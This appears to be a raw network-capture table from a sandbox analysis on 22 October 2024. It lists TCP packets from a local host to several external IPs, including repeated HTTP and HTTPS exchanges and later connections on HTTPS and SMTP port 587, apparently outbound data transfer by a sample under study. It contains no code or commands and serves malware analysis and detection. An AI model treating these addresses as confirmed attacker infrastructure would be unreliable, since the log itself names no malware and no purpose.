Oct 22, 2024 15:42:26.268273115 CEST	49723	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:26.269099951 CEST	49737	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:26.274192095 CEST	80	49723	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:26.274252892 CEST	49723	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:26.275255919 CEST	80	49737	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:26.275337934 CEST	49737	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:26.275635004 CEST	49737	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:26.280996084 CEST	80	49737	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:26.499303102 CEST	443	49736	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:26.522547007 CEST	49736	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:26.522597075 CEST	443	49736	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:26.663868904 CEST	443	49736	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:26.663949013 CEST	443	49736	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:26.664017916 CEST	49736	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:26.695477009 CEST	49736	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:26.793611050 CEST	49721	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:26.795798063 CEST	49742	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:26.800153971 CEST	80	49721	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:26.800210953 CEST	49721	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:26.801597118 CEST	80	49742	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:26.801677942 CEST	49742	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:26.801947117 CEST	49742	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:26.807873964 CEST	80	49742	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:27.158302069 CEST	80	49737	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:27.159795046 CEST	49744	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:27.159847975 CEST	443	49744	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:27.159929037 CEST	49744	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:27.160254002 CEST	49744	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:27.160279036 CEST	443	49744	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:27.204771996 CEST	49737	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:27.676618099 CEST	80	49742	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:27.677808046 CEST	49748	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:27.677864075 CEST	443	49748	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:27.678044081 CEST	49748	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:27.678571939 CEST	49748	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:27.678606987 CEST	443	49748	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:27.720395088 CEST	49742	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:27.766760111 CEST	443	49744	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:27.768902063 CEST	49744	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:27.768923998 CEST	443	49744	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:27.910461903 CEST	443	49744	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:27.910584927 CEST	443	49744	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:27.910759926 CEST	49744	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:27.911330938 CEST	49744	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:27.914499998 CEST	49737	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:27.915592909 CEST	49751	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:27.920346022 CEST	80	49737	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:27.920454979 CEST	49737	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:27.921106100 CEST	80	49751	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:27.921375990 CEST	49751	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:27.921530008 CEST	49751	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:27.926981926 CEST	80	49751	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:28.303088903 CEST	443	49748	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:28.304598093 CEST	49748	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:28.304636955 CEST	443	49748	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:28.487515926 CEST	443	49748	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:28.487615108 CEST	443	49748	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:28.487868071 CEST	49748	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:28.488168001 CEST	49748	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:28.492573977 CEST	49752	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:28.497925043 CEST	80	49752	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:28.498008966 CEST	49752	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:28.498122931 CEST	49752	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:28.503478050 CEST	80	49752	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:28.916229010 CEST	80	49751	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:28.917824030 CEST	49753	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:28.917850018 CEST	443	49753	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:28.917907953 CEST	49753	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:28.918234110 CEST	49753	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:28.918243885 CEST	443	49753	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:28.970407963 CEST	49751	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:29.385700941 CEST	80	49752	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:29.389796972 CEST	49760	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:29.389843941 CEST	443	49760	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:29.389980078 CEST	49760	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:29.390192986 CEST	49760	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:29.390212059 CEST	443	49760	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:29.439153910 CEST	49752	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:29.531022072 CEST	443	49753	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:29.533103943 CEST	49753	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:29.533195019 CEST	443	49753	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:29.672405958 CEST	443	49753	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:29.672524929 CEST	443	49753	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:29.672632933 CEST	49753	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:29.673089981 CEST	49753	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:29.676575899 CEST	49751	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:29.677978039 CEST	49761	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:29.682501078 CEST	80	49751	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:29.682555914 CEST	49751	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:29.683518887 CEST	80	49761	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:29.683583975 CEST	49761	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:29.683696032 CEST	49761	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:29.689213991 CEST	80	49761	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:30.008229017 CEST	443	49760	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:30.010159969 CEST	49760	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:30.010193110 CEST	443	49760	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:30.150382042 CEST	443	49760	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:30.150485039 CEST	443	49760	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:30.150525093 CEST	49760	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:30.151108980 CEST	49760	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:30.154484034 CEST	49752	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:30.155422926 CEST	49767	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:30.160336971 CEST	80	49752	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:30.160397053 CEST	49752	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:30.160871029 CEST	80	49767	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:30.160943985 CEST	49767	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:30.161077976 CEST	49767	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:30.166595936 CEST	80	49767	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:30.686779976 CEST	80	49761	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:30.688359976 CEST	49768	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:30.688399076 CEST	443	49768	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:30.688494921 CEST	49768	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:30.688983917 CEST	49768	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:30.688997030 CEST	443	49768	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:30.736026049 CEST	49761	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.014646053 CEST	80	49767	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:31.016067982 CEST	49774	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:31.016140938 CEST	443	49774	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:31.016360998 CEST	49774	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:31.016587019 CEST	49774	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:31.016602993 CEST	443	49774	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:31.064141989 CEST	49767	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.308855057 CEST	443	49768	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:31.310442924 CEST	49768	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:31.310477972 CEST	443	49768	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:31.472065926 CEST	443	49768	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:31.472199917 CEST	443	49768	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:31.472254992 CEST	49768	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:31.473094940 CEST	49768	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:31.477128983 CEST	49761	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.477813959 CEST	49775	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.483141899 CEST	80	49761	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:31.483170033 CEST	80	49775	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:31.483238935 CEST	49761	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.483294964 CEST	49775	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.483508110 CEST	49775	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.488828897 CEST	80	49775	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:31.622441053 CEST	443	49774	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:31.624069929 CEST	49774	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:31.624103069 CEST	443	49774	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:31.763606071 CEST	443	49774	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:31.763684034 CEST	443	49774	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:31.764193058 CEST	49774	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:31.764790058 CEST	49774	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:31.770548105 CEST	49778	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.770816088 CEST	49767	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.776007891 CEST	80	49778	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:31.776071072 CEST	49778	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.776201010 CEST	49778	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.776652098 CEST	80	49767	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:31.776719093 CEST	49767	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:31.781505108 CEST	80	49778	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:32.676529884 CEST	80	49775	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:32.676919937 CEST	80	49775	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:32.676983118 CEST	49775	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:32.677066088 CEST	80	49778	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:32.677901030 CEST	49783	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:32.677969933 CEST	443	49783	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:32.678201914 CEST	49783	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:32.678438902 CEST	49783	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:32.678457022 CEST	443	49783	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:32.678639889 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:32.678675890 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:32.678759098 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:32.679001093 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:32.679011106 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:32.720400095 CEST	49778	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:33.287658930 CEST	443	49783	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:33.289587975 CEST	49783	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:33.289644957 CEST	443	49783	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:33.296719074 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:33.298280001 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:33.298301935 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:33.433482885 CEST	443	49783	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:33.433590889 CEST	443	49783	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:33.433643103 CEST	49783	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:33.434432030 CEST	49783	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:33.443187952 CEST	49775	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:33.444626093 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:33.444643974 CEST	49790	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:33.444741964 CEST	443	49784	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:33.444787979 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:33.446294069 CEST	49784	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:33.449024916 CEST	80	49775	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:33.449084044 CEST	49775	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:33.450089931 CEST	80	49790	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:33.450195074 CEST	49790	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:33.450314999 CEST	49790	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:33.455692053 CEST	80	49790	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:33.458920956 CEST	49778	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:33.462368965 CEST	49791	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:33.464720964 CEST	80	49778	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:33.464772940 CEST	49778	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:33.467757940 CEST	80	49791	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:33.467824936 CEST	49791	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:33.467983007 CEST	49791	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:33.473248005 CEST	80	49791	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:35.162425041 CEST	80	49790	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:35.162636042 CEST	80	49791	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:35.162966967 CEST	80	49790	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:35.163105965 CEST	80	49791	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:35.163114071 CEST	49790	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:35.163523912 CEST	49791	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:35.163542032 CEST	80	49790	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:35.163580894 CEST	49790	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:35.163615942 CEST	80	49791	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:35.163649082 CEST	49791	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:35.163898945 CEST	49798	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.163948059 CEST	443	49798	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.164920092 CEST	49799	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.164959908 CEST	443	49799	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.164974928 CEST	49798	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.165007114 CEST	49799	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.165246964 CEST	49798	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.165258884 CEST	443	49798	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.165414095 CEST	49799	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.165426016 CEST	443	49799	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.776215076 CEST	443	49799	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.778302908 CEST	49799	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.778343916 CEST	443	49799	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.789428949 CEST	443	49798	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.791078091 CEST	49798	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.791121960 CEST	443	49798	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.919790030 CEST	443	49799	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.919940948 CEST	443	49799	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.920377016 CEST	49799	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.920744896 CEST	49799	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.926569939 CEST	49791	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:35.931256056 CEST	49806	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:35.932485104 CEST	80	49791	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:35.932563066 CEST	49791	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:35.935043097 CEST	443	49798	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.935142040 CEST	443	49798	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:35.935425043 CEST	49798	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.935735941 CEST	49798	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:35.936600924 CEST	80	49806	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:35.936757088 CEST	49806	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:35.936964035 CEST	49806	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:35.942281008 CEST	80	49806	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:35.995551109 CEST	49790	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:36.002408028 CEST	80	49790	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:36.002482891 CEST	49790	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:36.008146048 CEST	49807	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:36.008193016 CEST	443	49807	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:36.008390903 CEST	49807	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:36.008858919 CEST	49807	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:36.008883953 CEST	443	49807	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:36.803333044 CEST	80	49806	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:36.804541111 CEST	49813	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:36.804601908 CEST	443	49813	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:36.804692984 CEST	49813	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:36.804941893 CEST	49813	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:36.804958105 CEST	443	49813	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:36.844049931 CEST	443	49807	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:36.844213009 CEST	49807	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:36.845437050 CEST	49806	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:36.847860098 CEST	49807	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:36.847866058 CEST	443	49807	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:36.848119974 CEST	443	49807	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:36.856106043 CEST	49807	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:36.903328896 CEST	443	49807	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:37.126950026 CEST	443	49807	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:37.127023935 CEST	443	49807	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:37.127332926 CEST	49807	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:37.131736040 CEST	49807	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:37.413328886 CEST	443	49813	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:37.421839952 CEST	49813	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:37.421878099 CEST	443	49813	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:37.562915087 CEST	443	49813	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:37.563003063 CEST	443	49813	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:37.563052893 CEST	49813	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:37.563688040 CEST	49813	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:37.566984892 CEST	49806	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:37.568166971 CEST	49819	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:37.572808027 CEST	80	49806	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:37.572860003 CEST	49806	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:37.573487997 CEST	80	49819	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:37.573554993 CEST	49819	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:37.573689938 CEST	49819	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:37.579039097 CEST	80	49819	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:38.448908091 CEST	80	49819	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:38.450382948 CEST	49825	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:38.450437069 CEST	443	49825	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:38.450504065 CEST	49825	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:38.450798988 CEST	49825	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:38.450812101 CEST	443	49825	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:38.501688004 CEST	49819	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:39.075304031 CEST	443	49825	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:39.076947927 CEST	49825	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:39.076978922 CEST	443	49825	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:39.220820904 CEST	443	49825	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:39.220932007 CEST	443	49825	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:39.223526955 CEST	49825	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:39.223958969 CEST	49825	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:39.233508110 CEST	49819	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:39.235496044 CEST	49830	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:39.235543013 CEST	443	49830	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:39.239352942 CEST	80	49819	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:39.239454985 CEST	49819	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:39.239494085 CEST	49830	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:39.239494085 CEST	49830	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:39.239537001 CEST	443	49830	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:40.119065046 CEST	443	49830	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:40.119146109 CEST	49830	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:40.120472908 CEST	49830	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:40.120500088 CEST	443	49830	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:40.120748043 CEST	443	49830	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:40.122190952 CEST	49830	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:40.167331934 CEST	443	49830	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:40.400923967 CEST	443	49830	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:40.400991917 CEST	443	49830	149.154.167.220	192.168.2.6
Oct 22, 2024 15:42:40.401190996 CEST	49830	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:40.403614044 CEST	49830	443	192.168.2.6	149.154.167.220
Oct 22, 2024 15:42:42.292349100 CEST	49718	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:42.630311012 CEST	49847	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:42.635626078 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:42.635723114 CEST	49847	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:43.305406094 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:43.305649996 CEST	49847	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:43.311063051 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:43.463151932 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:43.464194059 CEST	49847	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:43.469715118 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:43.624629974 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:43.624892950 CEST	49847	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:43.630320072 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:45.468730927 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:45.468934059 CEST	49847	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:45.474287987 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:45.628842115 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:45.629019976 CEST	49847	587	192.168.2.6	208.91.199.223
Oct 22, 2024 15:42:45.634598970 CEST	587	49847	208.91.199.223	192.168.2.6
Oct 22, 2024 15:42:45.636698008 CEST	49742	80	192.168.2.6	132.226.247.73
